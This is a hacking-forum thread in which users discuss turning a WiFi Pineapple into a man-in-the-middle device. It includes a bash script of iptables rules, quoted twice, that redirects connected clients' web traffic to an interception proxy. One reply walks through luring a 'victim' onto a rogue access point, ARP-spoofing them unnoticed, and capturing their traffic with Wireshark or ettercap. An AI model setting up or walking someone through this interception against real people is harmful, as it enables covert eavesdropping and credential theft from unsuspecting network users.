WiFi pineapple MITM with Kali


M@s0n

Hi everyone,

I use the Wi-Fi Pineapple as a man-in-the-middle device, redirecting all traffic to a laptop that the Wi-Fi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

So here's my setup:

MacBook running a Linux VM (VirtualBox), connected via USB to the Wi-Fi Pineapple that's sending all traffic to the VirtualBox machine.

Pardon my diagram skills :(

Here is the script that I have created based off of the post above. However, I don't think this is ideal, since you would need to SSH into the Pineapple to run this script every time. Ideally it would be best to do this via the web interface of the Pineapple, via a simple "enable proxy" button etc. Any feedback would be appreciated.

 

#!/bin/bash
# Toggle redirection of clients' HTTP traffic to the proxy on the tethered host.

if [[ $# -eq 0 ]] ; then
    echo "Usage: $0 (enable|disable)"
    exit 1
fi

action="$1"
case "$action" in
    enable)
      echo "Enabling ..."
      # Send port-80 traffic to the proxy listening on 172.16.42.42:8080
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      iptables -t nat -A POSTROUTING -j MASQUERADE
    ;;
    disable)
      echo "Disabling ..."
      iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      # Also remove the MASQUERADE rule that "enable" appended
      iptables -t nat -D POSTROUTING -j MASQUERADE
    ;;
    *)
      echo "Usage: $0 (enable|disable)"
      exit 1
    ;;
esac

 

Screen Shot 2017-04-20 at 3.43.38 PM.png

Edited by M@s0n

Are you also trying to serve internet to the Pineapple network?

One easy, "hacky" way I have gotten this to work is to use the USB port to connect a third radio (the RT5370 as an example). This allows you to connect the Pineapple to a Wi-Fi network, and serve internet that way. This allows you to bypass the "need" to tether. So effectively now your Pineapple has become the next hop for anything that connects to the network being served from the Pineapple.

Start PineAP, and get a "victim" to connect to your Pineapple. The victim would also have internet provided through the wireless connection from the third USB radio.

Then I'll connect my "attack" box (i.e. Kali) to the network that the Pineapple is serving. Using the client list, figure out the MAC address of the victim. From there, the quick and dirty approach is to arpspoof the traffic, and allow IP forwarding on your attack box so that the traffic flows. The client likely won't be any wiser to it unless he/she is keeping a close eye on his ARP tables.

Now you can capture whatever traffic you wanted, as your attack box is now forwarding every packet that passes between the AP (your Pineapple) and the victim. From there you can shark the traffic, ettercap, etc ....

Again, I'm not saying this is the best way to do it, far from it. I'm just throwing out a quick and dirty way to get it up and running.

Edited by Captain

On 21/04/2017 at 3:48 AM, M@s0n said:

Hi everyone,

I would like to use the Wi-Fi Pineapple as a man-in-the-middle device, redirecting all traffic to a laptop that the Wi-Fi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

So here's my setup:

MacBook running a Linux VM (VirtualBox), connected via USB to the Wi-Fi Pineapple that's sending all traffic to the VirtualBox machine.

Pardon my diagram skills :(

Here is the script that I have created based off of the post above. However, I don't think this is ideal. Any feedback would be appreciated.

 

#!/bin/bash
# Toggle redirection of clients' HTTP traffic to the proxy on the tethered host.

if [[ $# -eq 0 ]] ; then
    echo "Usage: $0 (enable|disable)"
    exit 1
fi

action="$1"
case "$action" in
    enable)
      echo "Enabling ..."
      # Send port-80 traffic to the proxy listening on 172.16.42.42:8080
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      iptables -t nat -A POSTROUTING -j MASQUERADE
    ;;
    disable)
      echo "Disabling ..."
      iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      # Also remove the MASQUERADE rule that "enable" appended
      iptables -t nat -D POSTROUTING -j MASQUERADE
    ;;
    *)
      echo "Usage: $0 (enable|disable)"
      exit 1
    ;;
esac

 

Screen Shot 2017-04-20 at 3.43.38 PM.png

Can you elaborate why this setup is not ideal? If it is not working, try using 192.168.1.2 as the destination IP.


On 4/20/2017 at 0:48 PM, M@s0n said:

Hi everyone,

I use the Wi-Fi Pineapple as a man-in-the-middle device, redirecting all traffic to a laptop that the Wi-Fi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

 

 

Yeah, I ran across that article too when wanting to do bettercap on my laptop or Pi with the Nano. I knew there had to be an easier way to do it without messing with the tables on the Nano, since when you are tethering you are already routing traffic from it.

Here is a link to my thread. In the middle is the site and solution I did to do bettercap MITM. No modifying of iptables on the Nano necessary.

 
